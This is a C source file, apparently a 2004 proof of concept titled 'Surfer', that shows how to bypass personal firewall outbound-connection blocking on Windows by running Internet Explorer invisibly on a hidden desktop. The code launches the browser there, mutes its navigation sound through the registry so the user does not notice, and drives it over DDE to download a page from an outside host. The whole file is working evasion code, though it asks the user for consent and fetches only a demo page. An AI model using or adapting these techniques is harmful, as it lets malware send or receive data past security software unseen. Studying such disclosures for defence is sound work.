

/*
 * surfer.c -- surf in hidden desktop using DDE connection
 *
 * Jarkko Turkulainen jt[at]klake.org
 *
 *
 * TODO: support for other browsers
 *
 */


#include <stdio.h>
#include <windows.h>
#include <Wininet.h>


#define URL "http://www.klake.org/~jt/surfer.html"
#define IE_PATH "SOFTWARE\\Classes\\Applications\\iexplore.exe\\shell\\open\\command"
#define IE_SOUND "AppEvents\\Schemes\\Apps\\Explorer\\Navigating\\.current"

#define TIMEOUT 10000
#define MAXTIME 30000

char msg_caption[] = "Surfer v1.1 - (c) Jarkko Turkulainen 2004.";

char msg_start[] =
	"\nThis program is yet another demonstation of bypassing\n"
	"personal firewall outbound connection prevention mechanisms.\n\n"
	"It will try to dowload a document from the Internet by controlling\n"
	"Internet Explorer in invisible desktop with the DDE protocol.\n\n"
	"This will usually take 5-30 seconds.\n\n"
        "Do you wish to continue?\n\n";

char msg_error[] =
        "\nThere seems to be some problem with your network setup or\n"
        "your personal firewall software has blocked this attempt.\n\n";


#pragma comment(lib, "user32.lib")
#pragma comment(lib, "shell32.lib")
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "Wininet.lib")


/* NULL DDE callback function */

HDDEDATA CALLBACK DdeCallback(
	UINT uType,
	UINT uFmt,
	HCONV hconv,
	HSZ hsz1,
	HSZ hsz2,
	HDDEDATA hdata,
	DWORD dwData1,
	DWORD dwData2)
{
	return (HDDEDATA) NULL;
}

/* Find ie path from registy */

char * find_ie() {
	HKEY	result;
        LONG	ret;
        DWORD	size;
        char	data[1024], *ptr;
	int	i, space = 0;


	memset(data, 0, sizeof(data));
	size = sizeof(data);
	
	ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, IE_PATH, 0, KEY_READ, &result);

        /* Success */
        if (ret == ERROR_SUCCESS) {

		/* Query default value */
		if ((ret = RegQueryValueEx(result, NULL, NULL, NULL, data, &size)) != 
				ERROR_SUCCESS) {
			return NULL;
		}

		/* Parse the key */
		ptr = data;
		if (*ptr == '"') {
			space = 1;
			ptr++;
		}
		for (i = ptr - data; i < strlen(data); i++) {
			if (((data[i] == '"') && space) ||
			    ((data[i] == ' ') && !space)) {
				data[i] = '\0';
				break;
			}
		}
		return (strdup(ptr));

	}
	return NULL;
}

char * remove_sound() {
	HKEY	result;
        LONG	ret;
        DWORD	size;
	char 	sound[1024];

	size = sizeof(sound);
	ret = RegOpenKeyEx(HKEY_CURRENT_USER, IE_SOUND, 0, KEY_ALL_ACCESS, &result);

	/* Success */
        if (ret == ERROR_SUCCESS) {

		/* Query default value */
		if ((ret = RegQueryValueEx(result, NULL, NULL, NULL, sound, &size)) != 
				ERROR_SUCCESS) {
			return NULL;
		}

		size = 0;
		if ((ret = RegSetValueEx(result, NULL, 0, REG_EXPAND_SZ, (char *)&size, 0)) !=
				ERROR_SUCCESS) {
			return NULL;
		}
		return (strdup(sound));

	}
	return NULL;
}


void restore_sound(char *sound) {
	HKEY	result;

	/* Restore the sound ... */
	RegOpenKeyEx(HKEY_CURRENT_USER, IE_SOUND, 0, KEY_WRITE, &result);

	/* Success */
  	RegSetValueEx(result, NULL, 0, REG_EXPAND_SZ, sound, strlen(sound));
	
	return;

}


int WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) {
	OSVERSIONINFO	version;
	SECURITY_ATTRIBUTES sa;
	SECURITY_DESCRIPTOR sd;
	PROCESS_INFORMATION pi;
	STARTUPINFO	si;
	HDESK		desktop;
	int 		i, button;
	DWORD		bytes, pid = 0;
	HCONV		hconv = NULL;
	HSZ		topic, service, address;
	char		url[512], module[512], path[1024], *ie;
	HANDLE		event;
	LPINTERNET_CACHE_ENTRY_INFO     cinfo;
	unsigned char	cache[0x10000];


	/* Check version */
	version.dwOSVersionInfoSize = sizeof(version);
	GetVersionEx(&version);
	if ((version.dwPlatformId != VER_PLATFORM_WIN32_NT) || 
			(version.dwMajorVersion < 5)) {
		MessageBox(NULL, "only windows 2000/XP supported!\n", 
			msg_caption, MB_ICONEXCLAMATION|MB_OK);
		exit (0);
	}

	
	/* No arguments */	

	if (!*lpCmd) {

		button = MessageBox(NULL, msg_start, msg_caption, 
                        MB_ICONQUESTION|MB_YESNO);
                if (button == IDNO) {
                        exit (0);
                }

		/* Clear cache.... */
		DeleteUrlCacheEntry(URL);
		DeleteFile("surfer.html");

		/* Try to disable IE "click sound" */
		ie = remove_sound();

		/* Create the event */
		event = CreateEvent(NULL, FALSE, FALSE, "_inst_dde");

		/* Create the desktop */
		desktop = CreateDesktop("heya", NULL, NULL, 
			DF_ALLOWOTHERACCOUNTHOOK, MAXIMUM_ALLOWED, NULL);
  		
		/* Execute the second instance of this program.. */

		memset(&si, 0, sizeof(si));
 		memset(&pi, 0, sizeof(pi));
		si.cb = sizeof(si);
		si.lpDesktop = "heya";

		memset(path, 0, sizeof(path));
		memset(module, 0, sizeof(module));

		GetModuleFileName(0, module, sizeof(module));

		sprintf(path, "%s launch", module);
		CreateProcess(NULL, path, NULL, NULL, TRUE,
			NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi);

		/* Wait for the third instance.. */
		WaitForSingleObject(event, MAXTIME);

		/* Restore click */
		if (ie != NULL) {
			restore_sound(ie);
		}

		/* Clean up */
		CloseDesktop(desktop);
		CloseHandle(event);
		
		/* Check the results from cache.... */
		bytes = sizeof(cache);
		if (!GetUrlCacheEntryInfo(URL, (LPINTERNET_CACHE_ENTRY_INFO)cache, &bytes)) {
			MessageBox(NULL, msg_error, msg_caption, MB_ICONEXCLAMATION|MB_OK);
			exit (1);

		}
		cinfo = (LPINTERNET_CACHE_ENTRY_INFO)cache;

		CopyFile(cinfo->lpszLocalFileName, "surfer.html", FALSE);
		ShellExecute(0, "open", "surfer.html", NULL, 0, SW_NORMAL);

		exit (0);

	}

	/* Now we are running in the other desktop!!! */

	/* Create the signaling event */
	event = OpenEvent(EVENT_ALL_ACCESS, TRUE, "_inst_dde");

	/* Are we the 2nd instance? */
	if (!strcmp(lpCmd, "launch")) {
		
		/* This exploit works only for IE.... */
		if ((ie = find_ie()) == NULL) {
			SetEvent(event);
			exit (1);
		}	

		/* Execute the browser with empty window */
		ShellExecute(0, "open", ie, "-nohome", 0, SW_NORMAL);
		free(ie);

		/* Execute the third instance of this program.. */

		memset(&si, 0, sizeof(si));
 		memset(&pi, 0, sizeof(pi));
		si.cb = sizeof(si);

		memset(path, 0, sizeof(path));
		memset(module, 0, sizeof(module));

		GetModuleFileName(0, module, sizeof(module));

		sprintf(path, "%s dde", module);
		CreateProcess(NULL, path, NULL, NULL, TRUE,
			NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi);

		exit (0);

	}
	
	/* 
	 * 3rd instance
	 * Make sure that the 2nd instance has quit before injecting the url
	 * On some slow machines the process might be still be registered,
	 * sleep awhile..
	 *
	 */
	Sleep(1000);

	/* Initialize DDE */
	if ((i = DdeInitialize(&pid, DdeCallback, 
			APPCMD_CLIENTONLY, 0)) != DMLERR_NO_ERROR) {
		SetEvent(event);
		exit (1);
	}

	/* Check out browser.. Only IE supported */
	if (!(service = DdeCreateStringHandle(pid, "IEXPLORE", 0))) {
		SetEvent(event);
		exit (1);
	}

	/* Open the url */
	if (!(topic = DdeCreateStringHandle(pid, "WWW_OpenURL", 0))) {
		SetEvent(event);
		exit (1);
	}

	/* Create suitable url string */
	memset(url, 0, sizeof(url));
	sprintf(url, "\"%s\",,0xffffffff,0x1", URL);
	if (!(address = DdeCreateStringHandle(pid, url, CP_WINANSI))) {
		SetEvent(event);
		exit (1);
	}
	if (!(hconv = DdeConnect(pid, service, topic, NULL))) {
		SetEvent(event);
		exit (1);
	}
	if ((DdeClientTransaction(NULL, 0, hconv, address, 
			CF_TEXT, XTYP_REQUEST, TIMEOUT, NULL)) == FALSE) {
		SetEvent(event);
		exit (1);

	}
	DdeDisconnect(hconv);


	/* Wait for browser to finish it's job */
	Sleep(TIMEOUT);

	/* Shut down the browser */

	if (!(topic = DdeCreateStringHandle(pid, "WWW_Exit", 0))) {
		SetEvent(event);
		exit (1);
	}
	if (!(hconv = DdeConnect(pid, service, topic, NULL))) {
		SetEvent(event);
		exit (1);
	}
	/* The browser shuts down, but it's still error.. so don't care */
	DdeClientTransaction(NULL, 0, hconv, address, CF_TEXT, 
		XTYP_REQUEST, TIMEOUT, NULL);
	DdeDisconnect(hconv);

	/* Clean up */
	DdeFreeStringHandle(pid, topic);
	DdeFreeStringHandle(pid, service);
	DdeFreeStringHandle(pid, address);
	DdeUninitialize(pid);

	SetEvent(event);

	exit (0);

}

